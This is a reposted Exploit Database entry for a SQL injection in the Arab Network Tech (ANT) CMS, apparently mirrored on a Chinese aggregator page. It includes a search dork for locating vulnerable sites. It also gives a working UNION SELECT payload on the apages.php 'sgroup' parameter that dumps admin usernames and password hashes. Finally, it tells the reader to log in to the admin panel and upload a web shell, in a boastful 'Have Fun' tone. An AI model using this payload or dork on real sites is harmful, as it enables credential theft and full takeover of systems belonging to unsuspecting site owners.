Arab Network Tech. (ANT) CMS – SQL Injection

• Exploit Database
• 41 阅读

• 作者： Tr0y-x
  日期： 2010-02-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11339/

• :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  
  :::::::::::::::::::::::::
  
  Exploit Title : Arab Network Tech. (ANT) CMS SQL Injection
  
  Author : Tr0y-x
  
  Script Site : www.antpage.com<http://www.antpage.com/>
  
  Version : All Versions
  
  Tested on : Windows & Linux
  
  Dork : inurl:apages.php
  
  My home : WwW.SeC-WaR.CoM<http://www.sec-war.com/>
  
  :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  
  :::::::::::::::::::::::::
  
  =====================================Exploit===============
  
  =========================
  
  www.[Server}.com/[Path]/[SQL<http://www.[server%7d.com/[Path]/[SQL>]
  
  Example
  
  www.[Server}.com/[Path]/apages.php?sgroup<http://www.[server%7d.com/[Path]/apages.php?sgroup>=-
  
  10+UniOn+AlL+SeLeCt+1,2,concat
  
  (username,0x3a,password,0x3a),4,5,6,7,8,9,10+from+admins--
  
  Then Go to Admin panel Default www.[Server}.com/<http://www.[server%7d.com/>
  
  [Path]/admin
  
  And Upload Shell xD
  
  Have Fun :D
  
  ===========================================================
  
  =========================
  
  Greetz to : Alnjm33 - Predator - xXx - XR57 - Ahmadso -
  
  Black_Angle & All Sec-War Members